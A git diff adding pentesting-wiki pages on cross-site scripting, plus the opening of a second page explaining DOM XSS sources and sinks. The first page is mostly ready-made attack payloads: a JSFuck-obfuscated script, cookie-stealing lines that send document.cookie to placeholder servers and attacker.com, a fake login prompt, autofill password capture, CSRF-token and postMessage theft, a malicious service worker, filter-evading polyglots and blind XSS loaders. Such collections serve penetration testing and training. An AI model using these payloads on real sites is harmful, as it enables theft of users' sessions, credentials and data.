+<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
+```
+
+## XSS common payloads
+
+### Retrieve Cookies
+
+```javascript
+<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
+<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
+<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
+<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
+<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
+<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
+<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
+<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
+<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
+<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
+<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
+<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
+<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
+<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
+<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
+<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
+<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
+```
+
+### Port Scanner \(fetch\)
+
+```javascript
+const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
+```
+
+### Port Scanner \(websockets\)
+
+```python
+var ports = [80, 443, 445, 554, 3306, 3690, 1234];
+for(var i=0; i<ports.length; i++) {
+    var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
+    s.start = performance.now();
+    s.port = ports[i];
+    s.onerror = function() {
+        console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
+    };
+    s.onopen = function() {
+        console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
+    };
+}
+```
+
+### Box to as for credentials
+
+```markup
+<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
+```
+
+### Auto-fill passwords capture
+
+```javascript
+<b>Username:</><br>
+<input name=username id=username>
+<b>Password:</><br>
+<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
+method:'POST',
+mode: 'no-cors',
+body:username.value+':'+this.value
+});">
+```
+
+When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
+
+### XSS - Stealing CSRF tokens
+
+```javascript
+<script>
+var req = new XMLHttpRequest();
+req.onload = handleResponse;
+req.open('get','/email',true);
+req.send();
+function handleResponse() {
+    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
+    var changeReq = new XMLHttpRequest();
+    changeReq.open('post', '/email/change-email', true);
+    changeReq.send('csrf='+token+'&email=test@test.com')
+};
+</script>
+```
+
+### XSS - Stealing PostMessage messages
+
+```markup
+<img src="https://attacker.com/?" id=message>
+<script>
+ window.onmessage = function(e){
+ document.getElementById("message").src += "&"+e.data;
+</script>
+```
+
+### XSS - Abusing Service Workers
+
+A service worker is a **script** that your browser **runs** in the **background**, separate from a web page, opening the door to features that don't need a web page or user interaction. \([More info about what is a service worker here](https://developers.google.com/web/fundamentals/primers/service-workers)\).  
+The goal of this attack is to **create service workers** on the **victim session** inside the **vulnerable** web **domain** that grant the **attacker control** over **all the pages** the **victim** will load in **that domain**.
+
+In order to exploit this vulnerability you need to find:
+
+* A way to **upload arbitrary JS** files to the server and a **XSS to load the service worker** of the uploaded JS file
+* A **vulnerable JSONP request** where you can **manipulate the output \(with arbitrary JS code\)** and a **XSS** to **load the JSONP with a payload** that will **load a malicious service worker**.
+
+In the following example I'm going to present a code to **register a new service worke**r that will listen to the  `fetch` event and will **send to the attackers server each fetched URL** \(this is the code you would need to **upload** to the **server** or load via a **vulnerable JSONP** response\):
+
+```javascript
+self.addEventListener('fetch', function(e) {
+  e.respondWith(caches.match(e.request).then(function(response) {
+    fetch('https://attacker.com/fetch_url/' + e.request.url)
+});
+```
+
+And this is the code that will **register the worker** \(the code you should be able to execute abusing a **XSS**\). In this case a **GET** request will be sent to the **attackers** server **notifying** if the **registration** of the service worker was successful or not:
+
+```javascript
+<script>
+window.addEventListener('load', function() {
+var sw = "/uploaded/ws_js.js";
+navigator.serviceWorker.register(sw, {scope: '/'})
+  .then(function(registration) {
+    var xhttp2 = new XMLHttpRequest();
+    xhttp2.open("GET", "https://attacker.com/SW/success", true);
+    xhttp2.send();
+  }, function (err) {
+    var xhttp2 = new XMLHttpRequest();
+    xhttp2.open("GET", "https://attacker.com/SW/error", true);
+    xhttp2.send();
+  });
+});
+</script>
+```
+
+In case of abusing a vulnerable JSONP endpoint you should put the value inside `var sw`. For example:
+
+```javascript
+var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";
+```
+
+There is **C2** dedicated to the **exploitation of Service Workers** called [**Shadow Workers**](https://shadow-workers.github.io/) that will be very useful to abuse these vulnerabilities.
+
+### Polyglots
+
+```javascript
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
+" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
+';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
+javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
+javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
+javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
+javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
+javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
+javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
+javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
+--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
+/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
+javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
+/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
+-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
+<svg%0Ao%00nload=%09((pro\u006dpt))()//
+javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
+javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
+javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
+javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
+%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
+javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
+javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
+```
+
+### Blind XSS payloads
+
+```markup
+"><img src='//domain/xss'>
+"><script src="//domain/xss.js"></script>
+><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
+
+<!-- html5sec - Self-executing focus event via autofocus: -->
+"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>
+
+<!-- html5sec - JavaScript execution via iframe and onload -->
+"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')"> 
+
+<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
+"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>
+
+<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
+"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
+
+<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
+"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
+
+<!-- xsshunter.com - Sites that use JQuery -->
+<script>$.getScript("//domain")</script>
+
+<!-- xsshunter.com - When <script> is filtered -->
+"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>
+
+<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
+"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>
+
+<!-- whitelisted CDNs in CSP -->
+"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
+<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
+<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
+<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
+```
+
+## XSS Abusing other vulnerabilities
+
+### XSS in dynamic created PDF
+
+If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.  
+So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.  
+[**Find more information here.**](server-side-xss-dynamic-pdf.md)\*\*\*\*
+
+### XSS uploading files \(svg\)
+
+Upload as an image a file like the following one \(from [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)\):
+
+```markup
+Content-Type: multipart/form-data; boundary=---------------------------232181429808
+Content-Length: 574
+-----------------------------232181429808
+Content-Disposition: form-data; name="img"; filename="img.svg"
+Content-Type: image/svg+xml
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
+   <script type="text/javascript">
+      alert(1);
+   </script>
+</svg>
+-----------------------------232181429808--
+```
+
+```javascript
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <script type="text/javascript">alert("XSS")</script>
+</svg>
+```
+
+## Other JavaScript tricks
+
+### JavaScript Comments
+
+```javascript
+//This is a 1 line comment
+/* This is a multiline comment*/
+#!This is a 1 line comment, but "#!" must to be at the beggining of the line
+-->This is a 1 line comment, but "-->" must to be at the beggining of the line
+
+
+  for (let j = 0; j < 128; j++) {
+    for (let k = 0; k < 128; k++) {
+      for (let l = 0; l < 128; l++) {
+        if (j == 34 || k ==34 || l ==34)
+          continue;
+        if (j == 0x0a || k ==0x0a || l ==0x0a)
+          continue;
+        if (j == 0x0d || k ==0x0d || l ==0x0d)
+          continue;
+        if (j == 0x3c || k ==0x3c || l ==0x3c)
+          continue;
+        if (
+           (j == 47 && k == 47)
+           ||(k == 47 && l == 47)
+          )
+          continue;
+    try {
+        var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
+        eval(cmd);
+    } catch(e) {
+        var err = e.toString().split('\n')[0].split(':')[0];
+        if (err === 'SyntaxError' || err === "ReferenceError")
+          continue
+        err = e.toString().split('\n')[0]
+    }
+       console.log(err,cmd);
+    }
+    }
+  }
+  //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
+```
+
+### Javascript New Lines
+
+```javascript
+//Javascript interpret as new line these chars:
+String.fromCharCode(10) //0x0a
+String.fromCharCode(13) //0x0d
+String.fromCharCode(8232) //0xe2 0x80 0xa8
+String.fromCharCode(8233) //0xe2 0x80 0xa8
+
+  for (let j = 0; j < 65536; j++) {
+    try {
+        var cmd = '"aaaaa";'+String.fromCharCode(j) + '-->a.orange.ctf"';
+        eval(cmd);
+    } catch(e) {
+        var err = e.toString().split('\n')[0].split(':')[0];
+        if (err === 'SyntaxError' || err === "ReferenceError")
+          continue;
+        err = e.toString().split('\n')[0]
+    }
+    console.log(`[${err}]`,j,cmd);
+  }
+//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
+```
+
+### **Surrogate Pairs**
+
+This technique won't be very useful for XSS but it could be useful to bypass WAF protections. This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair.
+
+```python
+def unicode(findHex):
+    for i in range(0,0xFFFFF):
+        H = hex(int(((i - 0x10000) / 0x400) + 0xD800))
+        h = chr(int(H[-2:],16))
+        L = hex(int(((i - 0x10000) % 0x400 + 0xDC00)))
+        l = chr(int(L[-2:],16))
+        if(h == findHex[0]) and (l == findHex[1]):     
+            print(H.replace("0x","\\u")+L.replace("0x","\\u"))
+```
+
+More info:
+
+* [https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md](https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md)
+* [https://mathiasbynens.be/notes/javascript-unicode](https://mathiasbynens.be/notes/javascript-unicode) [https://mathiasbynens.be/notes/javascript-encoding](https://mathiasbynens.be/notes/javascript-encoding)
+
+## XSS resources
+
+[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)   
+[http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)  
+[https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
+
+### XSS TOOLS
+
+Find some [**tools for XSS here**](xss-tools.md)**.**
+
+## \*\*\*\*
+
diff --git a/pentesting-web/xss-cross-site-scripting/dom-xss.md b/pentesting-web/xss-cross-site-scripting/dom-xss.md
new file mode 100644
index 00000000..3127437b
--- /dev/null
+++ b/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -0,0 +1,377 @@
+# DOM XSS
+
+## **DOM vulnerabilities**
+
+> **Sources**
+>
+> A source is a JavaScript property that accepts data that is potentially attacker-controlled. An example of a source is the `location.search` property because it reads input from the query string, which is relatively simple for an attacker to control. Ultimately, any property that can be controlled by the attacker is a potential source. This includes the referring URL \(exposed by the `document.referrer` string\), the user's cookies \(exposed by the `document.cookie` string\), and web messages.
+
+> **Sinks**
+>
+> A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the `eval()` function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is `document.body.innerHTML` because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.
+
+Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session.
+
+**Common sources:**
+
+```javascript
+document.URL
+document.documentURI
+document.URLUnencoded
+document.baseURI
+location
+document.cookie
+document.referrer
+window.name
+history.pushState
+history.replaceState
+localStorage
+sessionStorage
+IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
+Database
+```
+
+**Common Sinks:**
+
+| \*\*\*\*[**Open Redirect**](dom-xss.md#open-redirect)\*\*\*\* | [**Javascript Injection**](dom-xss.md#javascript-injection)\*\*\*\* | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation)\*\*\*\* | **jQuery** |
+| :--- | :--- | :--- | :--- |
+| `location` | `eval()` | `scriptElement.src` | `add()` |
+| `location.host` | `Function() constructor` | `scriptElement.text` | `after()` |
+| `location.hostname` | `setTimeout()` | `scriptElement.textContent` | `append()` |
+| `location.href` | `setInterval()` | `scriptElement.innerText` | `animate()` |
+| `location.pathname` | `setImmediate()` | `someDOMElement.setAttribute()` | `insertAfter()` |
+| `location.search` | `execCommand()` | `someDOMElement.search` | `insertBefore()` |
+| `location.protocol` | `execScript()` | `someDOMElement.text` | `before()` |
+| `location.assign()` | `msSetImmediate()` | `someDOMElement.textContent` | `html()` |
+| `location.replace()` | `range.createContextualFragment()` | `someDOMElement.innerText` | `prepend()` |
+| `open()` | `crypto.generateCRMFRequest()` | `someDOMElement.outerText` | `replaceAll()` |
+| `domElem.srcdoc` | **\`\`**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation)\*\*\*\* | `someDOMElement.value` | `replaceWith()` |
+| `XMLHttpRequest.open()` | `FileReader.readAsArrayBuffer()` | `someDOMElement.name` | `wrap()` |
+| `XMLHttpRequest.send()` | `FileReader.readAsBinaryString()` | `someDOMElement.target` | `wrapInner()` |
+| `jQuery.ajax()` | `FileReader.readAsDataURL()` | `someDOMElement.method` | `wrapAll()` |
+| `$.ajax()` | `FileReader.readAsText()` | `someDOMElement.type` | `has()` |
+| **\`\`**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation)\*\*\*\* | `FileReader.readAsFile()` | `someDOMElement.backgroundImage` | `constructor()` |
+| `XMLHttpRequest.setRequestHeader()` | `FileReader.root.getFile()` | `someDOMElement.cssText` | `init()` |
+| `XMLHttpRequest.open()` | `FileReader.root.getFile()` | `someDOMElement.codebase` | `index()` |
+| `XMLHttpRequest.send()` | \*\*\*\*[**Link manipulation**](dom-xss.md#link-manipulation)\*\*\*\* | `someDOMElement.innerHTML` | `jQuery.parseHTML()` |
+| `jQuery.globalEval()` | `someDOMElement.href` | `someDOMElement.outerHTML` | `$.parseHTML()` |
+| `$.globalEval()` | `someDOMElement.src` | `someDOMElement.insertAdjacentHTML` | \*\*\*\*[**Client-side JSON injection**](dom-xss.md#client-side-sql-injection)\*\*\*\* |
+| **\`\`**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation)\*\*\*\* | `someDOMElement.action` | `someDOMElement.onevent` | `JSON.parse()` |
+| `sessionStorage.setItem()` | [**XPath injection**](dom-xss.md#xpath-injection)\*\*\*\* | `document.write()` | `jQuery.parseJSON()` |
+| `localStorage.setItem()` | `document.evaluate()` | `document.writeln()` | `$.parseJSON()` |
+| **\`\`**[**`Denial of Service`**](dom-xss.md#denial-of-service)**\`\`** | `someDOMElement.evaluate()` | `document.title` | **\`\`**[**Cookie manipulation**](dom-xss.md#cookie-manipulation)\*\*\*\* |
+| `requestFileSystem()` | **\`\`**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation)\*\*\*\* | `document.implementation.createHTMLDocument()` | `document.cookie` |
+| `RegExp()` | `document.domain` | `history.pushState()` | \*\*\*\*[**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning)\*\*\*\* |
+| \*\*\*\*[**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection)\*\*\*\* | \*\*\*\*[**Web-message manipulation**](dom-xss.md#web-message-manipulation)\*\*\*\* | `history.replaceState()` | `WebSocket` |
+| `executeSql()` | `postMessage()` | \`\` | \`\` |
+
+ The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`.
+
+This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using** any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS.
+
+## Examples
+
+### Open Redirect
+
+From: [https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection)
+
+#### How
+
+DOM-based open-redirection vulnerabilities arise when a script writes **attacker-controllable data** into a **sink** that can trigger **cross-domain navigation**.
+
+Remember that **if you can start the URL** were the victim is going to be **redirected**, you could execute **arbitrary code** like: **`javascript:alert(1)`**
+
+#### Sinks
+
+```text
+location
+location.host
+location.hostname
+location.href
+location.pathname
+location.search
+location.protocol
+location.assign()
+location.replace()
+open()
+domElem.srcdoc
+XMLHttpRequest.open()
+XMLHttpRequest.send()
+jQuery.ajax()
+$.ajax()
+```
+
+### Cookie manipulation
+
+From: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation)
+
+#### How
+
+DOM-based cookie-manipulation vulnerabilities arise when a script writes **attacker-controllable data into the value of a cookie**.  
+This could be abuse to make the page behaves on unexpected manner \(if the cookie is used in the web\) or to perform a [session fixation](../hacking-with-cookies.md#session-fixation) attack \(if the cookie is used to track the user's session\).
+
+#### Sinks
+
+```text
+document.cookie
+```
+
+### JavaScript Injection
+
+From: [https://portswigger.net/web-security/dom-based/javascript-injection](https://portswigger.net/web-security/dom-based/javascript-injection)
+
+#### How
+
+DOM-based JavaScript-injection vulnerabilities arise when a script executes **attacker-controllable data as JavaScript**.
+
+#### Sinks
+
+```text
+eval()
+Function() constructor
+setTimeout()
+setInterval()
+setImmediate()
+execCommand()
+execScript()
+msSetImmediate()
+range.createContextualFragment()
+crypto.generateCRMFRequest()
+```
+
+### Document-domain manipulation
+
+From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation)
+
+#### How
+
+Document-domain manipulation vulnerabilities arise when a script uses **attacker-controllable data to set** the **`document.domain`** property.
+
+ The `document.domain` property is used by browsers in their **enforcement** of the **same origin policy**. If **two pages** from **different** origins explicitly set the **same `document.domain`** value, then those two pages can **interact in unrestricted ways**.  
+Browsers **generally enforce some restrictions** on the values that can be assigned to `document.domain`, and may prevent the use of completely different values than the actual origin of the page. **But this doesn't occur always** and they usually **allow to use child** or **parent** domains.
+
+#### Sinks
+
+```text
+document.domain
+```
+
+### WebSocket-URL poisoning
+
+From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
+
+#### How
+
+WebSocket-URL poisoning occurs when a script uses **controllable data as the target URL** of a WebSocket connection.
+
+#### Sinks
+
+ The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities.
+
+### Link manipulation
+
